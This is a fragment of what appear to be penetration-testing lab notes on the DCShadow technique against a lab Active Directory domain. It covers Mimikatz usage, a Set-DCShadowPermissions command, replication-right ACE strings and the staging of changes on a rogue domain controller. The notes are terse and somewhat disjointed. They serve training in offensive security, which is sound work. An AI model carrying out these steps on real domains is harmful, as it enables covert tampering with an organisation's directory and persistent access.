elevate::token
won't work in mimikatz1 session as that elevated the privileges of the thread, but we need to elevate the privilege of the process.
You can also select and "LDAP" object: /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local
Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose
This means that the username student1 when logged on in the machine mcorp-student1 has DCShadow permissions over the object root1user.(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)
(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
(A;;WP;;;UserSID)
(A;;WP;;;UserSID)
(A;CI;CCDC;;;UserSID)
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl
/stack
with each change you want to make. This way, you will only need to /push
one time to perform all the stucked changes in the rouge server.